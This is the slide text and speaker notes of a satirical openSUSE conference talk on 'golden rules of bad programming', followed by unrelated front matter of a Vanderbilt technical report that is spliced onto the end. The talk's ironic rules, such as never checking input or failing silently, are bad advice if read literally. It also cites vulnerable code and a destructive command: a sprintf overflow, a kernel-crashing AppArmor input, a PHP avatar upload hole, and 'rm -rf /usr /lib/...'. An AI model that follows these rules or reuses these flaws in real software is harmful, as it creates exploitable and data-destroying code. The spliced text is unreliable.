1001 bugs - or: the golden rules of bad programming

Christian Boltz
openSUSE beta tester, PostfixAdmin developer, battle-hardened AppArmorer, ... and: BBfH

Never use any libraries or existing functions

Re-inventing the wheel is fun!

```php
function myprint ($text) {
    $handle = fopen("/dev/stdout", "w");
    fputs($handle, $text);
}
```

Photo: http://www.flickr.com/photos/vrogy/514733529/

Handle special values in a special way

looks like you have some special code in yast for password "x", maybe I should use the even more secure new password "y" in the future?! ;-)
[Harald Koenig, bnc#148464]

Invent new ways to make your program slow

```php
while ( $current < $list['alias_count'] ) {
    $query = "SELECT $table_alias.address FROM $table_alias [...] LIMIT $current, 1";
    $result = db_query ("$query");
    $row = db_array ($result['result']);
    $tmpstr = $row['address'];
    $idxlabel = $tmpstr[0] . $tmpstr[1]; // first two chars
    $current = $current + $page_size;
    $pagebrowser[] = $idxlabel;
}
```

Invent new ways to make your program slow

```php
$initcount = "SET @row=-1";
$result = db_query($initcount);
# get labels for relevant rows (first and last of each page)
$page_size_zerobase = $page_size - 1;
$query = "
    SELECT * FROM (
        SELECT $idxfield AS label, @row := @row + 1 AS row $querypart
    ) idx
    WHERE MOD(idx.row, $page_size) IN (0, $page_size_zerobase)
    OR idx.row = $count_results
";
$result = db_query ($query);
if ($result['rows'] > 0) {
    while ($row = db_array ($result['result'])) {
        # store all labels in an array
    }
}
```

Users hate error messages

Conclusion: never print an error message. Fail silently instead.

openSUSE developers seem to love this rule:
- no error message when RPM database is missing (bnc#148105)
- rcxdm doesn't start X in failsafe mode if xorg.conf.install was deleted (bnc#394316)

kweather not installed – and now?

> Hmm, what about looking out of the window?

Outside of the window is another window, the desktop background or the border of the monitor. How exactly would that help?
[full story: bnc#141107]

Never drop any privileges

... you might need them later again
- aa-notify broken on 11.4 because of missing permissions
- might apply to real world also

Make the UI easy to understand

[bnc#21867]

Make the UI easy to understand

vi commands are quite easy to remember. Once you know what
`dw db de d) d( d} d{ dd d^ d$ d0 dG`
as well as `cw` and `yw` do, you'll also know what
`cb ce c) c( c} c{ cc c^ c$ c0 cG`
and
`yb ye y) y( y} y{ yy y^ y$ y0 yG`
do.
[Bernd Bordesser in suse-linux, translated]

Take great care in setting bad defaults

zypper ar obs://home:cboltz home:cboltz
always adds the Factory repo instead of the repo for the installed version.
But there is a config option to hardcode the distribution in zypper.conf (and to have fun after upgrading the distribution) (/etc/SuSE-release anyone?)
[bnc#648892] [wontfix, ENOTIME]

It's enough to expect the usual data

(cron.daily doesn't run because the system is on battery)
Yes Karl, your machine has a battery! But no ac adapter :-)
Unfortunately it is the battery in the BT Mouse and it won't be able to power your system for very long :-)
[Stefan Seyfried, bnc#221999]

It's enough to expect the usual data

```c
#define IM_TEXT_LEN 32
char numstr[20];
char str[IM_TEXT_LEN];
sprintf(numstr, "%%2d%%%% %%.%ds", IM_TEXT_LEN-6);
sprintf(str, numstr, (int)(percent * 100), graph->pairs[i]->name);
```
[modlogan, bnc#517602]

It's enough to expect the usual data

```c
#define IM_TEXT_LEN 32
char numstr[20];
char str[IM_TEXT_LEN];
sprintf(numstr, "%%2d%%%% %%.%ds", IM_TEXT_LEN-6);  /* numstr = "%2d%% %.27s" */
sprintf(str, numstr, (int)(percent * 100), graph->pairs[i]->name);
```
[modlogan, bnc#517602]

Never make your code reusable

... especially if it has more than 1000 lines

Reusing pieces of code is like picking off sentences from other people's stories and trying to make a magazine article.
[Bob Frankston]

Besides that: Nobody needs that much code a second time ;-)

Make ALL your code reusable

(including each and every little script you write)

bad:
```php
echo "Hello World!";
```

Make ALL your code reusable

good:
```php
class HelloWorld {
    my $greeting = "Hello World!";
    function setGreet($newGreeting) {
        $greeting = $newGreeting;
    }
    function greet() {
        echo $greeting;
    }
}

$greeter = new HelloWorld;  # default text is fine
$greeter->greet;
```

Make ALL your code reusable

This will save you lots of work in the future. You can then just do:
```php
$greeter = new HelloWorld;
$greeter->setGreet("Hello openSUSE!");
$greeter->greet;
```

That's easier than
```php
echo "Hello openSUSE!";
```

Don't use small if blocks. Use cp instead.

```bash
cp edit-mailbox.php admin/edit-mailbox.php
vi admin/edit-mailbox.php   # remove permission checks
diff edit-mailbox.php admin/edit-mailbox.php | wc -l
15
... 5 years later ...
diff edit-mailbox.php admin/edit-mailbox.php | wc -l
250
```

Don't use small if blocks. Use cp instead.

Boring:

```
[Unit]
Description=Daemon to detect crashing apps
After=syslog.target

[Service]
ExecStart=/usr/sbin/abrtd
Type=forking

[Install]
WantedBy=multi-user.target
```

Don't use small if blocks. Use cp instead.

Also boring: CPAN_service in the buildservice

That would make it too obvious that you are a lazybone as packager and just use a template-based specfile. It's much more maintenance fun to check in the cpanspec-generated specfiles.

Always trust your users – or: never check user input

Even AppArmor followed this rule, so it can't be too wrong ;-)

```bash
echo 'AAA AAA' > /proc/$$/attr/current
Segmentation fault
```

[107353.169142] kernel BUG at /usr/src/packages/BUILD/kernel-desktop-2.6.37.6/linux-2.6.37/security/apparmor/audit.c:183!
[107353.169159] invalid opcode: 0000 [#7] SMP
[...]
[https://bugs.launchpad.net/bugs/789409]

Always trust your users – or: never check user input

Select the photo you want to use as avatar: /home/evil/myphoto.php – Upload

http://server/wbb/images/avatars/myphoto.php will give the admin some fun...
[Woltlab burning board 1.0.2]

Always trust your users – or: never check user input

The input you may expect will be completely unrelated to the input given by a disgruntled employee, a cracker with months of time on their hands, or a housecat walking across the keyboard.

Always trust your users – or: never check user input

[http://xkcd.com/327/]

Always check for errors

Especially if you write a library. It isn't trivial to write correct code:

```c
exit(-1);
syslog(LOG_ERROR, "Can't exit.\n");
```
[Lutz Donnerhacke in dclp, translated]

Never think about error handling

Just expect your code to work.
- error handling is only boring programming work, it's much more exciting to fix bugs after deploying the software on production-critical systems
- better invest your time in developing new features
- thinking about errors is the job of bugreporters anyway

Bugzilla speed with Coolo

> Status?
NEW
[Ihno Krumreich and Stephan Kulow, bnc#159223]

> which camera is this?
Marcus, this is my bug :)
[Marcus Meissner and Stephan Kulow, bnc#217731]

Never expect someone will use your software

Hardcoding your username is fine.

> mkdir: Can't create directory »/home/ratti«
> Looks like you should use ~ instead of /home/ratti ;-)
Wait and see – 0.0.3 will even work if your name is not "ratti" ;-)

Never expect someone will use your software

Never remove any debugging code (at least until someone forces you to do it)

mcelog should NOT email trenn@suse.de by default [bnc#713562]

Never expect someone will use your software

Hello everybody out there using minix - I'm doing a (free) operating system (just a hobby, won't be big and professional like gnu) for 386(486) AT clones. This has been brewing since april, and is starting to get ready.
I'd like any feedback on things people like/dislike in minix, as my OS resembles it somewhat (same physical layout of the file-system (due to practical reasons) among other things).
[Linus Torvalds, August 1991]

Nest your code as deep as possible

```php
if ($name == "foo") {
    if ($value == "bar") {
        if ($number > 0) {
            if ($flags == "baz") {
                # 1000 lines of code
            } else {
                die ("invalid flag");
            }
        } else {
            die ("invalid number");
        }
    } else {
        die ("invalid value");
    }
} else {
    die ("invalid name");
}
```

Never do something like this:

```php
if ($name != "foo")  { die ("invalid name"); }
if ($value != "bar") { die ("invalid value"); }
if ($number <= 0)    { die ("invalid number"); }
if ($flags != "baz") { die ("invalid flag"); }
# 1000 lines of code
```

Offer some brain training for your users

```bash
# zypper ar --help | grep refresh
-f, --refresh   Enable autorefresh of the repository.
# zypper mr --help | grep refresh
-r, --refresh   Enable auto-refresh of the repository.
```

Ignore compiler and rpmlint warnings

- real problems cause errors, not warnings
- conclusion: warnings are not a problem

Never submit your patches upstream

Keeping the patches in your package is fun:
- you look like a professional if you can handle 50 patches in a package
- you save upstream some work on reviewing and integrating the patches
- you always have some fun when updating the package and your patches to the next version

Never write any documentation

- if some old documentation exists, never update it
- nobody reads documentation anyways
- comments in the code also count as documentation – avoid adding them whenever possible

Never write any documentation

- nobody reads documentation anyways

Really? I've been doing this 10.1 test work just like a real user: In other words I never read any release notes or documentation :-)
[tomhorsley(at)adelphia.net in opensuse-factory]

Never write any documentation

- nobody reads documentation anyways

Really? Beware of the paperclips!
[bnc#65000]

Never trust a bugreporter

> > RESOLVED INVALID
> Henne, did you actually test this before closing the bug as invalid?
of course i did not test it. do you think i'm bored?
[bnc#420972]

Never trust a bugreporter

general rule: if Olaf reports a bug, it is a valid bug.
(Olaf Hering while reopening bnc#168595)

NEEDINFO fun

I am supposed to be the info provider, so here is my answer: 42
By the way: What is the question?
[Johannes Meixner, bnc#190173]

Never test small changes

switch2nvidia:
* fixed disabling Composite extension; script replaced "Option" with "Optioff" :-(
[commit message by Stefan Dirsch]

KMS_IN_INITRD="noyes"
[sed result, bnc#619218]

-ao=pulse,alsa
+,alsa
[setup-pulseaudio fun, bnc#681113]

Quoting in shell scripts is overestimated

@@ -352,1 +352,1 @@
- rm -rf /usr /lib/nvidia-current/xorg/xorg
+ rm -rf /usr/lib/nvidia-current/xorg/xorg

Probably the most-commented commit on github.
https://github.com/MrMEEE/bumblebee/commit/a047be
Hey, this makes you famous! ;-)

Wine developers prefer beer

Marcus Meissner told me at the openSUSE conference last October that most wine developers actually prefer beer. He also repeated this statement in the slides for today's "wine is not (only) an emulator" talk he's giving at LinuxTag together with me.

It must be a bug that wine developers prefer beer! Proposed fix:

```bash
for person in developers/* ; do
    sed -i 's/Prefer: beer/Prefer: wine/' "$person"
done
```

and the winner is...

Make your code easy to understand

```perl
#!/usr/bin/perl
# Make your code easy to understand
```

© September 27, 2011 Christian Boltz

special rule for openSUSE:

Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live.
[John F. Woods]

Thanks!
- everybody who accidentally ;-) contributed to my talk
- for the inspiration by http://www.karzauninkat.com/Goldhtml/ – "golden rules of bad HTML" (german)
- http://www.sapdesignguild.org/community/design/golden_rules.asp – "golden rules for bad user interfaces"
- http://blog.koehntopp.de/archives/2127-The-Importance-Of-FAIL.html and http://blog.koehntopp.de/archives/2611-Was-bedeutet-eigentlich-Never-check-for-an-error-condition-you-dont-know-how-to-handle.html – two great articles about FAIL by Kris Köhntopp
- perl Acme::EyeDrops for rendering rule #1
- for listening

Questions? Opinions? Flames?

You'll find lots of books telling you how to write good code. That's nice and maybe even useful, but boring ;-) My talk will give you something more inspiring: the golden rules of bad programming. BTW: I have no idea why rules have to be golden, but I won't break this tradition.

Never use any libraries or existing functions

Re-inventing the wheel is fun!

```php
function myprint ($text) {
    $handle = fopen("/dev/stdout", "w");
    fputs($handle, $text);
}
```

Using existing libraries is evil. Think of dependencies and bigger installed size if you use lots of libraries – do you really want that?

I have to admit that the example is very extreme, but I also have an example from practice – parsing commandline options. You might think "hey, I only need to handle two options" – no need for a library. That's also what happened in one of this year's GSoC projects. Sooner or later, you add more commandline switches, some of them accept options and so on. Sooner or later you have to switch to getopts, which already provides all the details you need.

Handle special values in a special way

looks like you have some special code in yast for password "x", maybe I should use the even more secure new password "y" in the future?! ;-)
[Harald Koenig, bnc#148464]

YaST had some special code that locked a newly created user if you give him password 'x'.
There are more examples where special values were handled in a special way. Think of all the y2k bugs where the year zero was handled in a funny way. And Linux will get a similar problem in 2038 when the unix time (seconds since 1970) doesn't fit in a 32bit variable anymore. I doubt anyone will still use 32bit systems by then, but nevertheless the problem might be embedded in data structures, file formats and in embedded devices like machine control units.

Invent new ways to make your program slow

```php
while ( $current < $list['alias_count'] ) {
    $query = "SELECT $table_alias.address FROM $table_alias [...] LIMIT $current, 1";
    $result = db_query ("$query");
    $row = db_array ($result['result']);
    $tmpstr = $row['address'];
    $idxlabel = $tmpstr[0] . $tmpstr[1]; // first two chars
    $current = $current + $page_size;
    $pagebrowser[] = $idxlabel;
}
```

A very good way to make a program slow is to do SQL queries in a loop. The above code is a shortened snippet from PostfixAdmin 2.3 to generate the pagebrowser (you know – the "a-c, d-f, g-k" links) in the listing of mail addresses. The code on the slide only fetches the starting point of each page; the original code fetches start and end point, which doubles the number of queries.

Following this rule worked quite well – with 1000 pages of mail addresses, it took 10 minutes until the pagebrowser was generated. And, very strange, there were even some users that complained about the loading time of that page...
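The query-per-page pattern described above is easy to reproduce. Here is a minimal sketch in Python with sqlite3 (not the PHP/MySQL of the original; table and column names are made up, and the fast variant uses SQLite's `ROW_NUMBER()` window function, available since SQLite 3.25):

```python
import sqlite3

# Toy table of mail addresses, a stand-in for PostfixAdmin's alias table.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE alias (address TEXT)")
db.executemany("INSERT INTO alias VALUES (?)",
               [(f"user{i:04d}@example.com",) for i in range(1000)])

PAGE_SIZE = 100

def labels_slow():
    """One query per page - the anti-pattern from the slide."""
    count = db.execute("SELECT COUNT(*) FROM alias").fetchone()[0]
    labels, current = [], 0
    while current < count:
        row = db.execute(
            "SELECT address FROM alias ORDER BY address LIMIT 1 OFFSET ?",
            (current,)).fetchone()
        labels.append(row[0][:2])   # first two chars
        current += PAGE_SIZE
    return labels

def labels_fast():
    """One query that returns only the first row of each page."""
    rows = db.execute("""
        SELECT address FROM (
            SELECT address, ROW_NUMBER() OVER (ORDER BY address) - 1 AS rn
            FROM alias
        ) WHERE rn % ? = 0""", (PAGE_SIZE,)).fetchall()
    return [r[0][:2] for r in rows]

assert labels_slow() == labels_fast()
```

With 1000 pages, the slow version issues 1000 queries (and pays the query overhead 1000 times); the fast one issues a single query and lets the database do the counting.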
Invent new ways to make your program slow

```php
$initcount = "SET @row=-1";
$result = db_query($initcount);
# get labels for relevant rows (first and last of each page)
$page_size_zerobase = $page_size - 1;
$query = "
    SELECT * FROM (
        SELECT $idxfield AS label, @row := @row + 1 AS row $querypart
    ) idx
    WHERE MOD(idx.row, $page_size) IN (0, $page_size_zerobase)
    OR idx.row = $count_results
";
$result = db_query ($query);
if ($result['rows'] > 0) {
    while ($row = db_array ($result['result'])) {
        # store all labels in an array
    }
}
```

Now here's what you should never do if you want to see your CPU busy: Let MySQL count over the rows and just get the relevant lines with one big query. The downside is that this doesn't work with PostgreSQL – if someone knows a similar working solution for PostgreSQL, please tell me after the talk.

Oh, and while we are talking about databases: There's also the good old and simple way to make your program slow – don't add an index to your tables. This small detail can already make your queries 100 times slower.

Users hate error messages

Conclusion: never print an error message. Fail silently instead.

openSUSE developers seem to love this rule:
- no error message when RPM database is missing (bnc#148105)
- rcxdm doesn't start X in failsafe mode if xorg.conf.install was deleted (bnc#394316)

That's the hardest type of bugreports – trying to explain to a developer that you want to see an error message added. Usually they'll explain to you why the thing you are doing can't work and that it's impossible to add working code for that case, which is usually a corner case. About 5 reopens later, they finally understand that all you want is an additional error message, which is what was already stated in the initial bugreport.

Sometimes the developers in the SUSE office have really difficult problems to solve. One day Marcus noticed that kweather was not installed by default, and I proposed to look out of the window. Rasmus Plewe tried this, but not too successfully.
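The "fail silently" rule above can be sketched in a few lines of Python (illustrative only; the file name and messages are made up): one loader swallows every error, the other forwards the full error to the caller.

```python
def load_config_silently(path):
    """The anti-pattern: the user gets an empty config and no hint why."""
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return ""

def load_config_loudly(path):
    """Forward the full error - "something didn't work" isn't helpful."""
    try:
        with open(path) as f:
            return f.read()
    except OSError as e:
        raise RuntimeError(f"cannot read config {path!r}: {e}") from e

# The silent version hides the missing file completely:
assert load_config_silently("/nonexistent/example.conf") == ""

# The loud version tells the user which file failed and why:
try:
    load_config_loudly("/nonexistent/example.conf")
except RuntimeError as e:
    assert "example.conf" in str(e)
```

The second variant is what the bugreports above were really asking for: not different behaviour, just a message saying what went wrong and where.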
Never drop any privileges

... you might need them later again
- aa-notify broken on 11.4 because of missing permissions
- might apply to real world also

aa-notify is part of AppArmor and can be used to display desktop notifications when a program violates the AppArmor policy. By dropping permissions, it lost the ability to read /var/log/audit/. Funnily, it somehow followed the "never drop any privileges" rule and didn't drop the group permissions. This means it was able to access the /var/log/audit/ directory with its group permissions on Ubuntu, but not on openSUSE because of stricter permissions.

That's the funny thing – sometimes two bugs neutralize each other. At least until someone like me comes along with permissions set too strictly for the group-permission bug to work.

Now guess what happens if you click continue. The answer is: YaST continues to cancel the installation – or, translated for the confused listeners: continue cancels the installation. If you click cancel, the installation will continue. Buttons named "yes" and "no" might be a better idea in such cases.

Make the UI easy to understand

vi commands are quite easy to remember. Once you know what `dw db de d) d{ dd d^ d$ d0 dG` as well as `cw` and `yw` do, you'll also know what `cb ce c) c{ cc c^ c$ c0 cG` and `yb ye y) y{ yy y^ y$ y0 yG` do.
[Bernd Bordesser in suse-linux, translated]

This example speaks for itself – vim is really easy to use.

Take great care in setting bad defaults

zypper ar obs://home:cboltz home:cboltz
always adds the Factory repo instead of the repo for the installed version.
But there is a config option to hardcode the distribution in zypper.conf (and to have fun after upgrading the distribution) (/etc/SuSE-release anyone?)
[bnc#648892] [wontfix, ENOTIME]

It's enough to expect the usual data

cron.daily doesn't run because the system is on battery

Yes Karl, your machine has a battery!
But no ac adapter :-)
Unfortunately it is the battery in the BT Mouse and it won't be able to power your system for very long :-)
[Stefan Seyfried, bnc#221999]

Here's a nice format string example from modlogan – who can tell me what it does? First it generates the format string numstr:
- `%2d` → 2 digits from `(int)(percent*100)`
- `%%` → `'%'` + space (2 byte)
- `%.27s` → 27 chars string with dots as fillers
Total: 31 bytes

And the even more interesting question: Why/how can it cause a buffer overflow?

Answer: with only one line in the log (in other words: only one client, only one browser type), you'll get 100%. That's 3 digits and makes the string one byte longer – 32 byte total, no space left for the null byte at the end.

Never make your code reusable

... especially if it has more than 1000 lines

Reusing pieces of code is like picking off sentences from other people's stories and trying to make a magazine article.
[Bob Frankston]

Besides that: Nobody needs that much code a second time ;-)

Make ALL your code reusable

(including each and every little script you write)

bad:
```php
echo "Hello World!";
```

That's bad code because it is not reusable. Let's make it better...
Make ALL your code reusable

good:
```php
class HelloWorld {
    my $greeting = "Hello World!";
    function setGreet($newGreeting) {
        $greeting = $newGreeting;
    }
    function greet() {
        echo $greeting;
    }
}

$greeter = new HelloWorld;  # default text is fine
$greeter->greet;
```

Here's the good code:
- the greeting text is in a variable – the code is flexible enough to work with different texts
- everything is encapsulated in a class – no internals are visible to the outside
- and, most important: it's reusable

Make ALL your code reusable

This will save you lots of work in the future. You can then just do:
```php
$greeter = new HelloWorld;
$greeter->setGreet("Hello openSUSE!");
$greeter->greet;
```

See how much work reusable code can save you in the future. Just create an instance of the class, set the text you want and let it print its greeting. And, most important...

Make ALL your code reusable

That's easier than
```php
echo "Hello openSUSE!";
```

… that's much easier than using code you can't reuse ;-)

In practice, the way to go is somewhere between this and the previous rule – big programs should have units of reusable code wherever it makes sense. OTOH, it doesn't make sense to make everything reusable, as the "hello world" example showed. Usually a pragmatic approach is the best choice – do what you think is best.

Don't use small if blocks. Use cp instead.

```bash
cp edit-mailbox.php admin/edit-mailbox.php
vi admin/edit-mailbox.php   # remove permission checks
diff edit-mailbox.php admin/edit-mailbox.php | wc -l
15
... 5 years later ...
diff edit-mailbox.php admin/edit-mailbox.php | wc -l
250
```

This is a real-world example from PostfixAdmin, however the numbers are just a not-so-wild guess.
Several years ago, edit-mailbox (for admins that have permissions only for some domains) and admin/edit-mailbox (for superadmins, think "root") had the same code, with the only exception that the superadmin code did not check for domain permissions. Over the years, several changes and bugfixes were done – but only in one copy of the code. The result was that several copies of nearly the same code existed, but each copy came with a different set of bugs.

That's what I found when I started working on PostfixAdmin in 2007. Since then I'm more or less doing code cleanup and removing duplicated code. But yes, we also introduced some new cool features.

Don't use small if blocks. Use cp instead.

Boring:

```
[Unit]
Description=Daemon to detect crashing apps
After=syslog.target

[Service]
ExecStart=/usr/sbin/abrtd
Type=forking

[Install]
WantedBy=multi-user.target
```

A more openSUSE-related example are initscripts. You all know how long the old-style initscripts are, and if you compare them, you'll find out that 80 or 90% of the code is the same in all initscripts. Now compare that to the systemd unit files. In short: the systemd unit files are way too short, boring and too easy to maintain.

Don't use small if blocks. Use cp instead.

Also boring: CPAN_service in the buildservice

That would make it too obvious that you are a lazybone as packager and just use a template-based specfile. It's much more maintenance fun to check in the cpanspec-generated specfiles.

Even more openSUSE-related: Source services in the buildservice. In general they are a good idea (or at least would be if they worked). For example the cpanspec service would make it much easier to package 90% of the perl packages. However, that would make it too obvious that you are a lazybone as packager and just use template-based specfiles. Checking in the cpanspec-generated specfile will give you much more maintenance fun.
When you update the package, you have the choice of
a) edit the version number in the specfile and hope that everything else continues to work
b) run cpanspec to recreate the specfile and hope that it didn't need an additional cpanspec parameter that you don't remember

My personal solution is to check in a "run-cpanspec.sh" script in my packages. And it's even funnier to discuss this with yaloki and darix who both hate source services ;-)

Always trust your users – or: never check user input

Even AppArmor followed this rule, so it can't be too wrong ;-)

```bash
echo 'AAA AAA' > /proc/$$/attr/current
Segmentation fault
```

[107353.169142] kernel BUG at /usr/src/packages/BUILD/kernel-desktop-2.6.37.6/linux-2.6.37/security/apparmor/audit.c:183!
[107353.169159] invalid opcode: 0000 [#7] SMP
[…]
[https://bugs.launchpad.net/bugs/789409]

Always trust your users – or: never check user input

Select the photo you want to use as avatar: /home/evil/myphoto.php

http://server/wbb/images/avatars/myphoto.php will give the admin some fun...
[Woltlab burning board 1.0.2]

Real-world case: a customer's forum software allowed uploading any file as avatar. Including PHP scripts... BTW: The next version fixed the upload vulnerability, but allowed downloading any file the webserver could read – including PHP files with database passwords and /etc/passwd.

I'd say the PHP security team isn't too wrong. They say...

Always trust your users – or: never check user input

The input you may expect will be completely unrelated to the input given by a disgruntled employee, a cracker with months of time on their hands, or a housecat walking across the keyboard.

… but this rule wouldn't be complete without little bobby tables…

Always trust your users – or: never check user input

[http://xkcd.com/327/]

Always check for errors

Especially if you write a library. It isn't trivial to write correct code:

```c
exit(-1);
syslog(LOG_ERROR, "Can't exit.\n");
```
[Lutz Donnerhacke in dclp, translated]

This rule is especially valid if you write a library. For example, there could be a failure in allocating memory. What do you do? There might be cases where you don't know how an error should be handled. In that case, it's indeed better to forward the error to the calling application instead of handling it yourself in a way that breaks the application. Please forward all details of the error – telling the application "something didn't work" isn't really helpful.

Back to the memory allocation failure: The library can't simply exit with an error message – that would also exit the calling program in an undefined state. The only solution I'd accept in a library is that it does a quick online order for _free_ memory modules. Or, more seriously, tell the calling application "memory allocation failure" and hope that it will handle this error in a sane way.

So the conclusion is...

Never think about error handling

Just expect your code to work.
- error handling is only boring programming work, it's much more exciting to fix bugs after deploying the software on production-critical systems
- better invest your time in developing new features
- thinking about errors is the job of bugreporters anyway

Bugzilla speed with Coolo

> Status?
NEW
[Ihno Krumreich and Stephan Kulow, bnc#159223]

> which camera is this?
Marcus, this is my bug :)
[Marcus Meissner and Stephan Kulow, bnc#217731]

Before we come to the top 10, here's some bugzilla speed comparison with Coolo.

Never expect someone will use your software

Hardcoding your username is fine.
> mkdir: Can't create directory »/home/ratti«
> Looks like you should use ~ instead of /home/ratti ;-)
Wait and see – 0.0.3 will even work if your name is not "ratti" ;-)

Never expect someone will use your software

Never remove any debugging code (at least until someone forces you to do it)

mcelog should NOT email trenn@suse.de by default [bnc#713562]

You probably have seen the online update to fix this bugreport some weeks ago.

... and finally the most prominent example of a person who never expected that his software would be used by anyone...

Never expect someone will use your software

Hello everybody out there using minix - I'm doing a (free) operating system (just a hobby, won't be big and professional like gnu) for 386(486) AT clones. This has been brewing since april, and is starting to get ready. I'd like any feedback on things people like/dislike in minix, as my OS resembles it somewhat (same physical layout of the file-system (due to practical reasons) among other things).
[Linus Torvalds, August 1991]

Nest your code as deep as possible

```php
if ($name == "foo") {
    if ($value == "bar") {
        if ($number > 0) {
            if ($flags == "baz") {
                # 1000 lines of code
            } else {
                die ("invalid flag");
            }
        } else {
            die ("invalid number");
        }
    } else {
        die ("invalid value");
    }
} else {
    die ("invalid name");
}
```

Never do something like this:

```php
if ($name != "foo")  { die ("invalid name"); }
if ($value != "bar") { die ("invalid value"); }
if ($number <= 0)    { die ("invalid number"); }
if ($flags != "baz") { die ("invalid flag"); }
# 1000 lines of code
```

Offer some brain training for your users

```bash
# zypper ar --help | grep refresh
-f, --refresh   Enable autorefresh of the repository.
# zypper mr --help | grep refresh
-r, --refresh   Enable auto-refresh of the repository.
```
[bnc#661410]

it would be too boring if the same short option would work for both, right?
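The early-return pattern from the nesting rule above can be rendered in a few lines; this is a Python sketch (the slides use PHP), with the same made-up parameter names and checks:

```python
# Guard clauses keep the main logic at nesting depth zero instead of
# burying it four "if" levels deep.

def process(name, value, number, flags):
    if name != "foo":
        raise ValueError("invalid name")
    if value != "bar":
        raise ValueError("invalid value")
    if number <= 0:
        raise ValueError("invalid number")
    if flags != "baz":
        raise ValueError("invalid flag")
    # ... the "1000 lines of code" would go here, un-indented ...
    return "ok"

assert process("foo", "bar", 1, "baz") == "ok"
```

Each guard handles one error case and exits immediately, so the error check sits right next to its message instead of its `else` branch being 1000 lines further down.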
Ignore compiler and rpmlint warnings

- real problems cause errors, not warnings
- conclusion: warnings are not a problem

examples:
- uninitialized variables can't be real. The memory is always full, therefore the variable must have some content
- and it will never happen that you mistyped the variable name.

Never submit your patches upstream

Keeping the patches in your package is fun:
- you look like a professional if you can handle 50 patches in a package
- you save upstream some work on reviewing and integrating the patches
- you always have some fun when updating the package and your patches to the next version

This slide is dedicated to the AppArmor package, but probably applies to lots of packages. I'd say the AppArmor package looks quite professional with 24 patches.

And I can confirm that upstreaming the patches causes some review work for upstream – I submitted most of the AppArmor patches upstream, and it took them some days until they turned up from my patch flood again. The result is that as soon as someone updates the AppArmor package to 2.7 beta, less than 10 patches will be left. That someone might even be me, but unfortunately one of the patches is 370 kB big and doesn't have a real chance to be accepted upstream.

Final reason not to upstream patches: The openSUSE package should always be better than the packages in other distributions, and having some important patches others don't have indeed makes the package better.

Never write any documentation

- if some old documentation exists, never update it
- nobody reads documentation anyways
- comments in the code also count as documentation – avoid adding them whenever possible

Never write any documentation

- nobody reads documentation anyways

Really? I've been doing this 10.1 test work just like a real user: In other words I never read any release notes or documentation :-)
[tomhorsley(at)adelphia.net in opensuse-factory]

Well, most users don't read the documentation.
But it might happen that the BBfH strikes again

Never write any documentation

- nobody reads documentation anyways

Really?

Beware of the paperclips! [bnc#65000]

Some people might remember the printed manuals from the good old times. Here's one of them. Each paperclip marks a bug in the “shell” chapter of the manual. This results in a bugreport that is about 3 printed pages long. First bugzilla comment: @bugreporter: please do not ever touch a paperclip again ... :)

Never trust a bugreporter

> > RESOLVED INVALID
> Henne, did you actually test this before closing
> the bug as invalid?

of course i did not test it. do you think i'm bored? [bnc#420972]

Bug reporters are evil, you remember? They steal your time by reporting defects and expect them to be fixed. By YOU, of course. And even worse, if you try to get rid of them by closing a bug as invalid, they reopen it... In this case it was a regression in the courier-imap initscript. Needless to say, the bugreport was valid...

general rule: if Olaf reports a bug, it is a valid bug. (Olaf Hering while reopening bnc#168595)

NEEDINFO fun

I am supposed to be the info provider, so here is my answer: 42
By the way: What is the question? [Johannes Meixner, bnc#190173]

Never test small changes

switch2nvidia: * fixed disabling Composite extension; script replaced "Option" with "Optioff" :-( [commit message by Stefan Dirsch]

KMS_IN_INITRD="noyes" [sed result, bnc#619218]

-ao=pulse,alsa
+,alsa
[setup-pulseaudio fun, bnc#681113]

valid for changes and scripts up to 200 lines ;-)

You'll probably find lots of similar examples, but these are the most interesting ones I could find. First the “Optioff” - but it worked and successfully disabled the Composite extension. In the second example, sed couldn't decide and finally put in “noyes” so that everyone is happy. And finally setup-pulseaudio broke the mplayer config file.
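The “Optioff” accident above is easy to reproduce: an unanchored sed pattern happily matches inside the word "Option" first. A sketch (the xorg.conf line is illustrative; the actual switch2nvidia script is not shown here):

```bash
line='Option "Composite" "on"'

# naive replacement: the first "on" sed finds is the one inside "Option"
echo "$line" | sed 's/on/off/'
# -> Optioff "Composite" "on"

# anchoring the pattern to the quoted value at end of line fixes it
echo "$line" | sed 's/"on"$/"off"/'
# -> Option "Composite" "off"
```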
Additionally mplayer didn't report in which file the error was, which meant some fun until I found out what had happened.

Quoting in shell scripts is overrated

```diff
@@ -352,1 +352,1 @@
- rm -rf /usr /lib/nvidia-current/xorg/xorg
+ rm -rf /usr/lib/nvidia-current/xorg/xorg
```

Probably the most-commented commit on GitHub. https://github.com/MrMEEE/bumblebee/commit/a047be

Hey, this makes you famous! ;-)

Wine developers prefer beer

Marcus Meissner told me at the openSUSE conference last October that most wine developers actually prefer beer. He also repeated this statement in the slides for today's "wine is not (only) an emulator" talk he's giving at LinuxTag together with me.

It must be a bug that wine developers prefer beer! Proposed fix:

```bash
for person in developers/*/
do
    # the slide omitted sed's target file - the file name used here is illustrative
    sed -i 's/Prefer: beer/Prefer: wine/' "${person}preferences"
done
```

and the winner is...

Ladies and gentlemen, here is number one of the golden rules of bad programming. *** drum roll ***

Make your code easy to understand

I think this code speaks for itself. I'll pay a glass of wine for the first person who tells me what this little program does. Yes, it is valid Perl code.

There is one special rule for openSUSE, and it might be more important than the other rules I told you:

special rule for openSUSE: Always code as if the guy who ends up maintaining your code will be a violent psychopath who knows where you live. [John F. Woods]

Thanks!
- everybody who accidentally ;-) contributed to my talk
- for the inspiration by http://www.karzauninkat.com/Goldhtml/ – “golden rules of bad HTML” (German)
- http://www.sapdesignguild.org/community/design/golden_rules.asp – “golden rules for bad user interfaces”
- http://blog.koehntopp.de/archives/2127-The-Importance-Of-FAIL.html and http://blog.koehntopp.de/archives/2611-Was-bedeutet-eigentlich-Never-check-for-an-error-condition-you-dont-know-how-to-handle.html – two great articles about FAIL by Kris Köhntopp
- Perl Acme::EyeDrops for rendering rule #1
- for listening

Questions? Opinions? Flames?
Institute for Software-Integrated Systems
Technical Report TR#: ISIS-15-111
Title: Software Quality Assurance for the META Toolchain
Authors: Ted Bapty, Justin Knight, Zsolt Lattmann, Sandeep Neema and Jason Scott

This research is supported by the Defense Advanced Research Project Agency (DARPA)’s AVM META program under award #HR0011-13-C-0041.

Copyright (C) ISIS/Vanderbilt University, 2015

# Table of Contents

- List of Figures
- List of Tables
- 1. Introduction
  - 1.1 Purpose
